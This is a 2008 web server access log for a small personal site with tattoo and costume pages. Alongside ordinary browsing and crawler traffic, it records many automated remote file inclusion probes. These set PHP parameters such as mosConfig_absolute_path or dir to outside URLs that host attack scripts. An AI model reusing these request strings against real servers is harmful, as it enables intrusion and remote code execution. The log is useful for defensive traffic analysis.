213.84.107.20 - - [03/Nov/2008:04:06:24 -0600] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
38.96.10.10 - - [03/Nov/2008:04:06:24 -0600] "GET /logs/access_log.1179273600 HTTP/1.0" 200 108926 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
213.84.107.20 - - [03/Nov/2008:04:06:36 -0600] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:36 -0600] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:36 -0600] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:36 -0600] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
38.96.10.10 - - [03/Nov/2008:04:07:06 -0600] "GET /logs/access_log.1159574400 HTTP/1.0" 200 179630 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
219.85.63.226 - - [03/Nov/2008:04:07:32 -0600] "GET /logs//?mosConfig_absolute_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 200 36689 "-""libwww-perl/5.805"
87.106.16.18 - - [03/Nov/2008:04:07:34 -0600] "GET /logs/skin/zero_vote/error.php?dir=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.106.16.18 - - [03/Nov/2008:04:07:34 -0600] "GET /logs/access_log.1202428800/skin/zero_vote/error.php?dir=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
38.96.10.10 - - [03/Nov/2008:04:07:45 -0600] "GET /logs/access_log.1167004800 HTTP/1.0" 200 162927 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:04:08:19 -0600] "GET /logs/access_log.1169424000 HTTP/1.0" 200 272012 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
200.21.133.252 - - [03/Nov/2008:04:08:40 -0600] "GET /modules/addons/plugin.php?doc_root=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.21.133.252 - - [03/Nov/2008:04:08:40 -0600] "GET /logs/modules/addons/plugin.php?doc_root=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.106.16.18 - - [03/Nov/2008:04:09:32 -0600] "GET /logs/access_log.1202428800%20%20/skin/zero_vote/error.php?dir=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.106.16.18 - - [03/Nov/2008:04:09:39 -0600] "GET /logs/access_log.1208044800%20%20/skin/zero_vote/error.php?dir=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
116.126.143.88 - - [03/Nov/2008:04:10:01 -0600] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.mahbaran.com/load/test.txt?? HTTP/1.1" 404 303 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
116.126.143.88 - - [03/Nov/2008:04:10:01 -0600] "GET /lostpasswd.php?env[include_prefix]=http://www.mahbaran.com/load/test.txt?? HTTP/1.1" 404 298 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
213.171.37.206 - - [03/Nov/2008:04:10:30 -0600] "GET /logs/access_log.1202428800/skin/zero_vote/error.php?dir=http://www.geocities.com/kamtiez_family2000/kontol.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
213.171.37.206 - - [03/Nov/2008:04:10:30 -0600] "GET /skin/zero_vote/error.php?dir=http://www.geocities.com/kamtiez_family2000/kontol.txt??%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
213.171.37.206 - - [03/Nov/2008:04:10:30 -0600] "GET /logs/skin/zero_vote/error.php?dir=http://www.geocities.com/kamtiez_family2000/kontol.txt??%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
213.171.37.206 - - [03/Nov/2008:04:10:31 -0600] "GET /logs/access_log.1208044800/skin/zero_vote/error.php?dir=http://www.geocities.com/kamtiez_family2000/kontol.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
61.50.221.108 - - [03/Nov/2008:04:12:08 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
61.50.221.108 - - [03/Nov/2008:04:12:08 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
70.38.38.230 - - [03/Nov/2008:04:12:32 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.814"
70.38.38.230 - - [03/Nov/2008:04:12:32 -0600] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.814"
200.105.248.78 - - [03/Nov/2008:04:12:44 -0600] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
200.105.248.78 - - [03/Nov/2008:04:12:44 -0600] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
210.219.173.249 - - [03/Nov/2008:04:13:28 -0600] "GET /logs/skin/zero_vote/error.php?dir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:04:13:28 -0600] "GET /logs/access_log.1202428800/skin/zero_vote/error.php?dir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.105.248.78 - - [03/Nov/2008:04:14:15 -0600] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
200.105.248.78 - - [03/Nov/2008:04:14:17 -0600] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
87.106.16.18 - - [03/Nov/2008:04:14:54 -0600] "GET /logs/access_log.1208044800/skin/zero_vote/error.php?dir=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.125.46.108 - - [03/Nov/2008:04:16:19 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://en.gov.ua/downloads/plans/sb.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.125.46.108 - - [03/Nov/2008:04:16:19 -0600] "GET //index.php?DOCUMENT_ROOT=http://en.gov.ua/downloads/plans/sb.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.32.6.162 - - [03/Nov/2008:04:17:28 -0600] "GET /logs/plugins/payment/paymenow/paymenow.inc.php?config[root_dir]=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
72.32.6.162 - - [03/Nov/2008:04:17:28 -0600] "GET /plugins/payment/paymenow/paymenow.inc.php?config[root_dir]=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
72.32.6.162 - - [03/Nov/2008:04:17:28 -0600] "GET /logs/access_log.1203465600/plugins/payment/paymenow/paymenow.inc.php?config[root_dir]=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
66.197.201.69 - - [03/Nov/2008:04:18:07 -0600] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://igamevillage.com//ray/modules/global/id.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:04:18:07 -0600] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://igamevillage.com//ray/modules/global/id.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:04:18:09 -0600] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://igamevillage.com//ray/modules/global/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
208.43.85.170 - - [03/Nov/2008:04:19:37 -0600] "GET /robots.txt HTTP/1.0" 404 282 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
208.43.85.170 - - [03/Nov/2008:04:19:41 -0600] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "http://o.webring.com/hub?ring=tattoos;id=100;prvw""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
208.43.85.170 - - [03/Nov/2008:04:19:45 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.0" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
208.43.85.170 - - [03/Nov/2008:04:19:50 -0600] "GET /tattoo/webring.jpg HTTP/1.0" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
210.219.173.249 - - [03/Nov/2008:04:20:05 -0600] "GET /logs/access_log.1208044800%20%20/skin/zero_vote/error.php?dir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
117.110.136.131 - - [03/Nov/2008:04:20:29 -0600] "GET /plugins/payment/paymenow/paymenow.inc.php?config[root_dir]=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
117.110.136.131 - - [03/Nov/2008:04:20:29 -0600] "GET /logs/access_log.1203465600/plugins/payment/paymenow/paymenow.inc.php?config[root_dir]=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
117.110.136.131 - - [03/Nov/2008:04:20:29 -0600] "GET /logs/plugins/payment/paymenow/paymenow.inc.php?config[root_dir]=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
210.219.173.249 - - [03/Nov/2008:04:20:45 -0600] "GET /logs/access_log.1202428800%20%20/skin/zero_vote/error.php?dir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
78.111.80.12 - - [03/Nov/2008:04:20:46 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.karwecka.co.uk/Joomla/administrator/help/en-GB/css/gang11/chid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:04:20:46 -0600] "GET /logs/access_log.1206576000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.karwecka.co.uk/Joomla/administrator/help/en-GB/css/gang11/chid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:04:20:46 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.karwecka.co.uk/Joomla/administrator/help/en-GB/css/gang11/chid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:04:21:26 -0600] "GET /logs/access_log.1208304000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.karwecka.co.uk/Joomla/administrator/help/en-GB/css/gang11/chid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
83.149.69.97 - - [03/Nov/2008:04:21:28 -0600] "GET /logs/access_log.1211587200//encapscms_PATH/core/core.php?root=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:04:21:29 -0600] "GET //encapscms_PATH/core/core.php?root=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:04:21:29 -0600] "GET /logs//encapscms_PATH/core/core.php?root=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
62.87.154.41 - - [03/Nov/2008:04:21:30 -0600] "GET /logs/access_log.1207180800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
62.87.154.41 - - [03/Nov/2008:04:21:30 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.87.154.41 - - [03/Nov/2008:04:21:31 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
62.141.48.87 - - [03/Nov/2008:04:21:39 -0600] "GET /logs//errors.php?error=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
62.141.48.87 - - [03/Nov/2008:04:21:39 -0600] "GET /logs/access_log.1208044800//errors.php?error=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.141.48.87 - - [03/Nov/2008:04:21:40 -0600] "GET /logs/access_log.1214956800//errors.php?error=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.149.69.97 - - [03/Nov/2008:04:21:47 -0600] "GET /logs/access_log.1214524800//encapscms_PATH/core/core.php?root=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
78.111.80.12 - - [03/Nov/2008:04:21:50 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karwecka.co.uk/Joomla/administrator/help/en-GB/css/gang11/chid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:04:21:50 -0600] "GET /logs/access_log.1205366400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karwecka.co.uk/Joomla/administrator/help/en-GB/css/gang11/chid.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:04:22:10 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karwecka.co.uk/Joomla/administrator/help/en-GB/css/gang11/chid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
62.87.154.41 - - [03/Nov/2008:04:22:21 -0600] "GET /logs/access_log.1203724800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
89.218.85.18 - - [03/Nov/2008:04:24:36 -0600] "GET /logs/access_log.1205366400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idv6.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:04:24:36 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idv6.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:04:24:36 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idv6.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
210.219.173.249 - - [03/Nov/2008:04:27:41 -0600] "GET /logs/access_log.1208044800/skin/zero_vote/error.php?dir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
88.84.142.41 - - [03/Nov/2008:04:29:59 -0600] "GET //include/write.php?dir=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
88.84.142.41 - - [03/Nov/2008:04:29:59 -0600] "GET /logs//include/write.php?dir=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 307 "-""Mozilla/3.0 (OS/2; U)"
65.55.104.156 - - [03/Nov/2008:04:30:01 -0600] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.197.201.69 - - [03/Nov/2008:04:34:11 -0600] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:04:34:11 -0600] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:04:34:11 -0600] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
61.50.221.108 - - [03/Nov/2008:04:35:40 -0600] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
61.50.221.108 - - [03/Nov/2008:04:35:40 -0600] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
66.197.201.69 - - [03/Nov/2008:04:36:31 -0600] "GET /logs/access_log.1213142400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
208.83.106.201 - - [03/Nov/2008:04:38:19 -0600] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.mahbaran.com/load/test.txt?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
208.83.106.201 - - [03/Nov/2008:04:38:19 -0600] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.mahbaran.com/load/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
65.55.208.119 - - [03/Nov/2008:04:38:34 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [03/Nov/2008:04:38:34 -0600] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
88.84.142.41 - - [03/Nov/2008:04:40:24 -0600] "GET //atom.php5?page=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
88.84.142.41 - - [03/Nov/2008:04:40:25 -0600] "GET /logs//atom.php5?page=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 299 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
66.197.201.69 - - [03/Nov/2008:04:41:33 -0600] "GET /logs/access_log.1206144000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:04:41:33 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:04:41:33 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
88.84.142.41 - - [03/Nov/2008:04:42:09 -0600] "GET //ashnews.php?pathtoashnews=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 296 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
88.84.142.41 - - [03/Nov/2008:04:42:09 -0600] "GET /logs//ashnews.php?pathtoashnews=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.197.201.69 - - [03/Nov/2008:04:42:12 -0600] "GET /logs/access_log.1206230400//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.171.98.77 - - [03/Nov/2008:04:42:52 -0600] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
82.203.3.7 - - [03/Nov/2008:04:42:52 -0600] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "http://www.google.co.uk/search?hl=en&q=vintage+tattoo+flash&meta=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:52 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.0" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:52 -0600] "GET /tattoo/webring.jpg HTTP/1.0" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:53 -0600] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
216.171.98.77 - - [03/Nov/2008:04:42:56 -0600] "GET /tattoo/set2.htm HTTP/1.0" 200 2378 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
82.203.3.7 - - [03/Nov/2008:04:42:56 -0600] "GET /tattoo/set2.htm HTTP/1.0" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:56 -0600] "GET /tattoo/tatb1.JPG HTTP/1.0" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:56 -0600] "GET /tattoo/tatb3.JPG HTTP/1.0" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:56 -0600] "GET /tattoo/tatb2.JPG HTTP/1.0" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:56 -0600] "GET /tattoo/tatb10.JPG HTTP/1.0" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:57 -0600] "GET /tattoo/tatb5.JPG HTTP/1.0" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:57 -0600] "GET /tattoo/tatb4.JPG HTTP/1.0" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:57 -0600] "GET /tattoo/tatb6.JPG HTTP/1.0" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:57 -0600] "GET /tattoo/tatb7.JPG HTTP/1.0" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:58 -0600] "GET /tattoo/tatb8.JPG HTTP/1.0" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:42:58 -0600] "GET /tattoo/tatb9.JPG HTTP/1.0" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
216.171.98.77 - - [03/Nov/2008:04:43:07 -0600] "GET /tattoo/set3.htm HTTP/1.0" 200 2177 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
82.203.3.7 - - [03/Nov/2008:04:43:07 -0600] "GET /tattoo/set3.htm HTTP/1.0" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
